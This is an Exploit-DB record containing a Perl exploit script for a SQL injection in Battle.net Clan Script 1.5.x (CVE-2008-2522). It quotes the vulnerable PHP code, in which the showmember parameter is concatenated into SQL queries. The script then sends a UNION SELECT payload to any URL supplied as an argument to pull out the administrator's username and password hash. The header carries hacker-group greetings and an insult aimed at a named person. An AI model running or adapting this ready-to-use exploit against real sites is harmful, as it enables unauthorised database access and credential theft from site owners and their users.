Battle.net Clan Script <= 1.5.x - Remote SQL Injection Exploit

2008-05-12T00:00:00
ID EDB-ID:5597
Type exploitdb
Reporter Stack
Modified 2008-05-12T00:00:00

Description

Battle.net Clan Script <= 1.5.x Remote SQL Injection Exploit. CVE-2008-2522. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl -w
# download script : http://sourceforge.net/project/showfiles.php?group_id=142506&package_id=156487
##############################################################
# Battle.net Clan Script &lt;= 1.5.x - Remote SQL Inj Exploit   #
##############################################################
########################################
#[*] Founded by : Stack-Terrorist [v40]
#[*] Contact: Ev!L
#[*] Greetz : Houssamix & All muslims HaCkeRs  :)
#[*] Fuck   : JosS :@
########################################
# vulnerable page
########################################
#&lt;div id="header"&gt;&lt;h1&gt;&lt;?php echo $site_name ?&gt;&lt;/h1&gt;&lt;/div&gt;
#&lt;div id="gutter"&gt;&lt;/div&gt;
#&lt;div id="col1"&gt;
# &lt;?php showNav(); ?&gt;#div&gt;
#&lt;div id="col2"&gt;
# &lt;?php
# if(!isset($_GET['showmember']))
# { ?&gt;
#  &lt;h2&gt;Members&lt;/h2&gt;
#  &lt;table id="members"&gt;
#   &lt;tr&gt;
#    &lt;th&gt;Rank&lt;/th&gt;
#    &lt;th&gt;Member Name&lt;/th&gt;
#    &lt;th&gt;Email&lt;/th&gt;
#    &lt;th&gt;Date Joined&lt;/th&gt;
#   &lt;/tr&gt;
#   &lt;?php#mysql_select_db($mysql_db) or die(mysql_error());
#   $sql = 'SELECT bcs_members.id, bcs_members.name, bcs_members.email, bcs_members.date, bcs_ranks.`order`, bcs_ranks.name AS rank '
#    . 'FROM bcs_members, bcs_ranks WHERE bcs_members.rank = bcs_ranks.id ORDER BY `order`, id';
#   $alt = 0;
#   $result = mysql_query($sql)  or die(mysql_error());
#   while($r=mysql_fetch_array($result))
#   {
#    $id=$r["id"];
#    $name=$r["name"];
#    $rank=$r["rank"];
##    $email=$r["email"];
 #   $recruit=$r["recruit"];
 #   $date=$r["date"];
 #   if($recruit === '') { $recruit = '&nbsp;'; }
 #   if ($alt % 2 == 0) { echo '&lt;tr class="altrow"&gt;' . "\n"; }
 ##   else {  echo '&lt;tr&gt;' . "\n"; }
  #  echo '&lt;td&gt;' . $rank . '&lt;/td&gt;' . "\n";
  #  echo '&lt;td&gt;&lt;a href="?page=members&showmember=' . $name . '"&gt;' . $name . '&lt;/a&gt;&lt;/td&gt;' . "\n";
  ##  if($email === '') { echo '&lt;td&gt;n/a&lt;/td&gt;' . "\n"; }
   # else { echo '&lt;td&gt;&lt;a href="mailto:' . $email . '"&gt;Email&lt;/a&gt;&lt;/td&gt;' . "\n"; }
   # echo '&lt;td&gt;' . date("F d, Y", strtotime($date)) . '&lt;/td&gt;' . "\n";
   # echo '&lt;/tr&gt;' . "\n";
   # $alt = $alt + 1;
   #}
   #?&gt;
  #&lt;/table&gt;
# &lt;?php
 #} // end of if $_GET
 #else
 #{?&gt;
 # &lt;h2&gt;Member Details&lt;/h2&gt;
 # &lt;table id="members"&gt;
 #  &lt;tr&gt;
 #   &lt;th&gt;Rank&lt;/th&gt;
 #   &lt;th&gt;Member Name&lt;/th&gt;
 #   &lt;th&gt;Email&lt;/th&gt;
  #  &lt;th&gt;Date Joined&lt;/th&gt;
  # &lt;/tr&gt;
  # &lt;tr&gt;
  # &lt;?php
  # mysql_connect($mysql_host, $mysql_user, $mysql_pass) or die(mysql_error());
  # mysql_select_db($mysql_db) or die(mysql_error());
  # $sql = "SELECT `bcs_members`.`name`, `bcs_members`.`email`, `bcs_members`.`date`, `bcs_ranks`.`name` AS 'rank'"
  #  . "FROM `bcs_members`, `bcs_ranks` WHERE `bcs_members`.`rank` = `bcs_ranks`.`id` AND `bcs_members`.`name` = '" . $_GET['showmember'] . "'";
  # $result = mysql_query($sql)  or die(mysql_error());
  # $r=mysql_fetch_array($result);
  # echo '&lt;td&gt;' . $r["rank"] . '&lt;/td&gt;' . "\n";
  # echo '&lt;td&gt;' . $r["name"] . '&lt;/td&gt;' . "\n";
  # if($r["email"] === '') { echo '&lt;td&gt;n/a&lt;/td&gt;' . "\n"; }
  # else { echo '&lt;td&gt;&lt;a href="mailto:' . $r["email"] . '"&gt;Email&lt;/a&gt;&lt;/td&gt;' . "\n"; }
  # echo '&lt;td&gt;' . date("F d, Y", strtotime($r["date"])) . '&lt;/td&gt;' . "\n";
  # ?&gt;
  # &lt;/tr&gt;
  #&lt;/table&gt;
  #&lt;br/&gt;
  #&lt;h2&gt;Medals&lt;/h2&gt;
  #&lt;table id="members"&gt;
  # &lt;tr&gt;
  #  &lt;th&gt;Medal&lt;/th&gt;
  #  &lt;th&gt;Medal Name&lt;/th&gt;
  #  &lt;th&gt;Description&lt;/th&gt;
  # &lt;/tr&gt;
  # &lt;tr&gt;
  # &lt;?php
  # $alt = 0;
  # $sql = 'SELECT `bcs_medals` . `path` , `bcs_medals` . `name` , `bcs_medals` . `description` '
  #  . ' FROM `bcs_medals` , `bcs_members` , `bcs_medal_list` '
   # . " WHERE `bcs_members` . `name` = '" . $_GET['showmember'] . "'"
   # . ' AND `bcs_medal_list` . `mem_id` = `bcs_members` . `id` '
  #  . ' AND `bcs_medal_list` . `medal` = `bcs_medals` . `id` ';
  # $result = mysql_query($sql)  or die(mysql_error());
  # while($r=mysql_fetch_array($result))
  # {
  #  $id=$r["id"];
   # $name=$r["name"];
   # $path=$r["path"];
   # $desc=$r["description"];
   # if ($alt % 2 == 0) { echo '&lt;tr class="altrow"&gt;' . "\n"; }
   # else {  echo '&lt;tr&gt;' . "\n"; }
   # echo '&lt;td class="center"&gt;&lt;img src="' . $path . '" alt="' . $name . '"/&gt;&lt;/td&gt;' . "\n";
   # echo "&lt;td&gt;" . $name . "&lt;/td&gt;\n";
   # echo "&lt;td&gt;" . $desc . "&lt;/td&gt;\n";
   # echo "&lt;/tr&gt;\n";
   # $alt = $alt + 1;
   #}?&gt;
#   &lt;/tr&gt;
#  &lt;/table&gt;
# &lt;?php
#  echo "&lt;br/&gt;\n";
#  echo "&lt;h2&gt;Recruited&lt;/h2&gt;\n";
#  $result = mysql_query("SELECT bcs_members.name FROM bcs_members, (SELECT id FROM bcs_members WHERE name = '" . $_GET['showmember'] . "') AS results "
#   . "WHERE results.id = bcs_members.recruit")  or die(mysql_error());
#  while($r=mysql_fetch_array($result))
#  {
#   echo $r["name"] . "&lt;br/&gt;\n";
#  }
# }
# ?&gt;
#&lt;/div&gt;
#&lt;div id="footer"&gt;&lt;?php echo $release; ?&gt;&lt;/div&gt;*/
#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
system("color a");
print "\t\t############################################################\n\n";
print "\t\t# Battle.net Clan Script &lt;= 1.5.x - Remote SQL Inj Exploit #\n\n";
print "\t\t#                 by Stack-Terrorist [v40]                 #\n\n";
print "\t\t############################################################\n\n";
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
system("color f");
#the username of joomla
$user="name";
#the pasword of joomla
$pass="password";
#the tables of joomla
$tab="bcs_members";
$b = LWP::UserAgent-&gt;new() or die "Could not initialize browser\n";
$b-&gt;agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/?page=members&showmember=-1'%20union%20select%20".$pass.",user(),44,".$user."+from+".$tab."+where+id=1/*";
$res = $b-&gt;request(HTTP::Request-&gt;new(GET=&gt;$host));
$answer = $res-&gt;content;
if ($answer =~ /&lt;td&gt;(.*?)&lt;\/td&gt;/){
        print "\nBrought to you by v4-team.com...\n";
        print "\n[+] Admin User : $1";
}
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t#   Exploit has ben aported user and password hash   #\n\n";}
else{print "\n[-] Exploit Failed...\n";}
# exploit exploited by Stack-Terrorist 

# milw0rm.com [2008-05-12]